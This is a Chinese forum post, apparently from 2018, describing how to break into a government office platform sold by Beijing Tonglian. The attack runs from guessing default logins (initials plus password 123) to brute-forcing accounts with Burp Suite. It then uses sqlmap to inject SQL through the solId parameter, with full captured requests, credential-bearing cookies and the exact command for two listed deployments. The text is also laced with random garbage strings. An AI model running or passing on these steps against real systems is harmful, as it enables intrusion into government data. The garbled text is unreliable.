|
$ J2 p& Y, V0 g2 Q0 ^3 H
2 |% n t2 Q5 o, y
( f- I1 {/ T, Q7 A
7 T h" c4 f: H- B( [ 平台简介:
* b0 ~: ^! U. \0 w7 ~& x+ f3 r) `/ ] - n# O2 l9 r, o5 c: T: T9 n6 w
2 a7 ~+ c0 U F) ~
8 a9 h( H/ f! U6 z5 z+ O% ^+ m0 e ( Z* V, h: F1 q7 I7 X( z f* L8 J1 @
# i: F/ V" D; d6 h& P; ] 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" r, A. c- w/ C同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ j5 J1 y$ ?- D" [; P0 C8 Q3 Y
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!; T! j* P( \! \5 X* s
' n, Z# T% s- T9 d) N- u
0 L$ G4 m; |8 N& z4 `0 E, j
& _5 v- k( F s2 X8 O 5 ^& M. M& Y, q t! m+ r
5 v- L" {: ^! z) B7 k
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:8 f7 m4 B+ E' F, J5 e
" Q4 B; n" ]6 H7 P( ]/ v
5 q: K: g0 c2 I0 y. l% b! B
- T2 e8 B& |; S- g4 U4 N; n! W7 [, W
5 n B6 B: T! b8 V/ Y: D6 X
+ A% S) q8 ?$ _) Q# f7 t( w http://1.1.1.1:7197/cap-aco/#(案例2-)
+ Z" h b' X1 `7 C1 J. q0 H! o 7 D0 w& j4 q! P
( |2 I- _) D# E! U& W: o http://www.XXOO.com (案例1-官网网站)
c0 Z# s" }. X
; x* q0 Z" _$ q1 C6 h! D3 q) y
. h4 H- n5 y2 d0 z, V) N& m ) H1 d# M' Q9 M2 x- D
7 p% r: U6 Y( O6 A3 E4 c
6 v! S! n# p/ K- j' T 漏洞详情:
" _9 \/ k5 O; X/ Q
' X# i$ K' i4 _+ e8 J
- V/ o' C; U% t1 _( Y4 C! t' B 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试3 I3 e7 P0 O" L" u k
2 F$ n; t) N$ k- N0 M, B9 L% k
4 M7 r* f; S! j* c: X- }# O 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
3 v) ], t, _( e+ v9 l# y , i* r1 X& u3 V4 G
- C$ T/ [5 o7 |. r9 L% N5 K3 m6 E
/ c a9 {; w% l
& i( E- o1 l0 z2 q) m
A3 M m# i2 U/ X7 I4 r  # d0 E$ o6 V+ k- d6 H/ M
~. E3 n& T9 F- \6 w
7 {; l$ R3 O! V& e3 @ status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
% d) k$ o9 g* [, @1 Q- L0 h* k
1 R+ j$ P; J6 @! c) E3 l" ~
1 L/ } w+ u. j 1、案例1-官方网站& U' D0 u4 _0 Q; A1 V' F. \6 Q
7 D8 b- S0 ^5 P5 J6 D9 h
" J9 C- b; I3 R: } GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.14 h& u8 J! z2 w6 \* k2 _
( |) Y: }$ `# X- y% u: J% g
+ f! z. d. _" f- p; E$ g7 f; a# q
Host: www.XXOO.com
% a# @% n1 ~0 ]2 L/ N: b5 ~/ S 4 ^: u9 j/ I/ |3 U$ Y! a* R
& c/ C* l* T8 q0 k! q* g3 ~ Proxy-Connection: Keep-Alive
U" c/ L3 y8 ] Y, b8 P! H) L 2 z+ U" q: G2 c* Y9 S/ [
5 L0 B- }. A, q
Accept: application/json, text/javascript, */*; q=0.01; }; Z- `! \' w9 T2 I3 d2 Y
) _ a8 P4 X- D* {; ?; R: j
& z8 Y: W+ N- T6 ]1 K5 ^
Accept-Language: zh-CN/ v/ X' g$ y/ g& c- X) T, _
' k& O0 U% N3 G0 O8 u {
. B2 N2 C8 }9 `' }/ x+ r" c
Content-Type: application/json* L* s: o7 S; ^5 j! l' ]3 L
0 s- Y( ?5 q& s+ d4 F9 L" t0 I |0 v1 W q+ U5 O$ E8 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko( k3 |. {) b8 X0 ^( ?( o# W. z
& d1 q% [3 O9 v- F. ^( g* t" R' }. F0 ]( k
X-Requested-With: XMLHttpRequest% ?+ z6 l8 l* R/ f# A+ X
) h) N& d' s9 k' l$ f/ }
$ c" c- f/ X" ] Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002, J0 N% M$ C* l; w
9 G! C6 s, i: M) N |
k) z! Q3 G9 B2 k
Accept-Encoding: gzip, deflate, sdch5 F2 L; C7 Z- V3 j
- ~6 ~3 c; q& \" C1 y( F
. R) \7 g" n o' J1 G# w Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e [7 y" \: }3 {9 f
% O5 \+ E2 Y5 m9 W
5 J+ @. l/ q( K" W/ Z8 Q$ m 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:4 N: F/ C' M% U/ X1 r2 L' a
( L1 h. }6 c; Q( C
# a8 U4 x+ X, b5 L" l7 I4 Q+ G' _
6 t8 Y0 V+ [; l9 s9 M $ @: a. _/ v2 I& T* S6 }
# F: X9 @$ N% [; Q 
8 z& }( l* c5 H. d , r3 S" P$ d% m- s9 ]* x; Q
) }* `+ D5 l' O) f4 Q& a4 v
1 e7 f3 E3 q4 W# b) | : b9 L) A" R) c/ F7 O2 Z: ^# o
1 h$ G# h& X9 z ; s d; t5 d5 i, s: e/ m
% U# Z, D0 f! N' W. q4 \) |" b- I3 u$ ?/ h; c( s9 E
/ ]7 w, }3 P: T d8 L" ?; g6 }% ? . W/ L2 u* D8 _( p: j; J: W# @
' D# S D' E/ }! u o
2、案例2-某天河云平台9 I5 z/ s' o% K, x
1 ` ]6 W" s; Q9 M
3 l' f Z& f; P* V5 K. r. } GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
' p) m* B% ? [8 d3 k, i 2 F9 j; `( \- {2 p. ?' q T
1 [3 ^# z l( G) p1 O5 t5 X Host: 1.1.1.:7197
2 ~* J0 V r% H, L9 v
+ y4 b0 J7 J( l& h1 O' F! _; [, d2 Z5 w- _% g: F% D
Accept: application/json, text/javascript, */*; q=0.01
8 c% [" \. ?9 n: n . l7 o; U0 d2 w; s4 d
8 a* N) j( _7 Y' x) v
X-Requested-With: XMLHttpRequest s/ k/ J8 K$ f
6 y& d& e3 Z& {6 ^7 a1 ]
" V1 R7 @9 P$ |( O User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0) y- m! h$ a! H7 F2 A1 t( {
; |( f, O! q/ U9 {4 x& y, R+ A+ y
! P5 b# A3 b2 Q8 Q) B3 K+ ] Content-Type: application/json
( Q' a5 S% S1 f- b# Y2 d+ o
$ e! c. V( U) D9 P
% Y" r' B5 ~/ K- N: f, x: C( f) W Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
7 s9 I, k7 u( F( F2 ]- {- t 4 {6 N/ J; o3 C/ c
r1 Y: D3 e' o Accept-Language: zh-CN,zh;q=0.8( ?3 v- M' b$ l5 s2 l
8 }8 G" }# N5 c) f- [# K+ i5 m" v
6 M: r+ B; r8 I0 B; r$ V$ d; s Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=12 M3 ^1 Q# h2 L" V/ U& D1 d
- C3 k& k2 {# I F" x1 T* G7 `! { p. Y: z% B
Connection: close. |9 r; X' G5 S0 S; ^2 \; _6 s
, L2 Z, m1 Y9 x/ d! m, T4 _. I
9 Y9 t* N2 `$ c" z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
# G& t7 z/ N3 f/ U
) [ f2 \% i3 L' [9 ^( M9 s, k
7 A3 x" I" V" Q( o% Z  ) H: [6 C6 @. `& U1 ?" j
( k; T9 k: n7 R2 L* }) o- I
/ C9 k7 ^$ n, B) L
" Q* u; L, n" _9 E | 
发表于 2018-10-20 20:15:17
收藏
支持
反对